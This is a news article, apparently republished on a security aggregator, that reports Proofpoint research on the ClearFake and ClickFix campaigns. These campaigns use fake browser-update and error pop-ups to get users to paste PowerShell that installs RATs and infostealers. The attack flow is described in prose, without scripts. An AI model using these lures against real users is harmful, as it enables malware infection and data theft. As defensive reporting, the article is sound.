Cut & Paste Tactics Import Malware to Unwitting Victims

ClearFake and ClickFix attackers are tricking people into cutting and pasting malicious PowerShell scripts to infect their own machines with RATs and infostealers.

Threat actors are using fake browser updates and software fixes to trick users into cutting/copying and pasting PowerShell scripts loaded with various malware strains — including remote access Trojans (RATs) and infostealers — to infect their computers.
Researchers from Proofpoint observed the socially engineered technique employed by initial access broker tracked as
TA571,
as well as an unidentified actor in the last three months, starting as early as March 1, they revealed in a blog post published June 17.
There appear to be two methods of social engineering used in the activity — one that offers fake browser updates in yet another
ClearFake campaign
, and the other that delivers error messages related to Word, Google Chrome, and OneDrive dubbed ClickFix by the researchers. Malware delivered in the campaign includes the
DarkGate
and
NetSupport
RATs, the malware loader
Matanbuchus
, and various information stealers, including Lumma and Vidar.
Whether the initial campaign begins via malspam or delivered via web browser injects, the technique is similar, Proofpoint researchers Tommy Madjar, Dusty Miller, Selena Larson, and the Proofpoint Threat Research Team
explained in the post
.
The campaigns show users are a pop-up textbox that suggests an error occurred when trying to open the document or webpage, and further instructions to copy and paste a malicious script into either the PowerShell terminal or the Windows Run dialog box to eventually execute the script via PowerShell, they said.
Attackers use clever and authoritative social engineering in the fake error messages delivered to users in the campaign, and also provides both the problem and a solution so that a viewer may take prompt action without pausing to consider the risk, the researchers noted.
The activity reflects a trend among cybercriminals to adopt increasingly creative attack chains that ensure the success of campaigns that employ nested PowerShell and other technical tactics that are not easily detected by users, they said.
Proofpoint first observed the cut-and-paste technique with a ClearFake campaign in early April as well as every other ClearFake campaign since then, the researchers noted.
ClearFake
is a previously identified fake browser update activity cluster that compromises legitimate websites with malicious HTML and JavaScript.
In the latest campaigns, when a user visited a compromised website, the injection caused the website to load a malicious script hosted on the blockchain via Binance’s Smart Chain contracts, using a technique known as EtherHiding. The initial script then loaded a second script from a domain to eventually present a fake warning warning instructing them to install a root certificate to view the website correctly.
The message included instructions to click a button to copy a PowerShell script and then provided steps on how to manually run this script on the victims computer. If this is done, the user effectively executes the PowerShell by pasting it into the PowerShell command line interface window. Proofpoint observed at least five types of malware being delivered in this way, including
the Lumma stealer
, Amadey Loader, and JaskaGo.
Proofpoint first began to observe what it calls the ClickFix campaign in mid-April when its researchers found compromised sites containing an inject leading to an iframe on pley[.]es displayed as an overlay error message. The messaged claimed that a faulty browser update needed to be fixed and asked the victim to open “Windows PowerShell (Admin)”–which will open an User Account Control (UAC) prompt–and then right-click to paste the code.
If users take the bait, PowerShell runs another remote PowerShell script that downloads and runs an executable, eventually leading to
Vidar stealer
. While the payload domain used in the PowerShell was taken offline just a few days after the researchers discovered the activity, the custom content of the iframe was replaced with the ClearFake injection that was still active earlier this month. The researchers remain unclear if the same actor is behind ClearFake and ClickFix, however.
Proofpoint observed TA571 using cut-and-paste PowerShell against victims as early as March 1 in a campaign that included more than 100,000 messages and targeted thousands of organizations globally. The threat actor employed emails containing an HTML attachment that displayed a page resembling Microsoft Word as well as error message claiming that the Word Online extension is not installed.
The message presented users with two options to continue, either how to fix or auto-fix, both of which led them down to malicious paths to install malware, including Matanbuchus or
DarkGate
, using PowerShell or DLL files.
TA571s use of similar attack chains throughout the spring using various visual lures and varying between instructing the victim to either open the PowerShell terminal or using the Run dialog box demonstrates a link between the actor and the ClickFix campaign, the researchers noted.
Proofpoint included a list of indicators of compromise (IoCs) in recent campaigns, acknowledging that it is not an exhaustive list but merely a snapshot of websites, email addresses, and other processes related to the malicious activity that its researchers have observed.
Overall the attack chain requires significant user interaction to be successful, which means the most practical way for organizations to help avoid compromise on their network is
employee awareness
and
training
, the researchers noted.
Organizations should train users to identify the activity and report suspicious activity to their security teams, the researchers wrote. This is very specific training but can easily be integrated into an existing user training program. 

Last News
▸ ArcSight prepares for future at user conference post HP acquisition. ◂ Discovered: 07/01/2025 Category: security	▸ Samsung Epic 4G: First To Use Media Hub ◂ Discovered: 07/01/2025 Category: security	▸ Many third-party software fails security tests ◂ Discovered: 07/01/2025 Category: security

**Cyber Security Categories**
Google Dorks Database	Exploits Vulnerability	Exploit Shellcodes

CVE List

Tools/Apps

News/Aarticles

Phishing Database

Deepfake Detection

Trends/Statistics & Live Infos

Tags:
Cut & Paste Tactics Import Malware to Unwitting Victims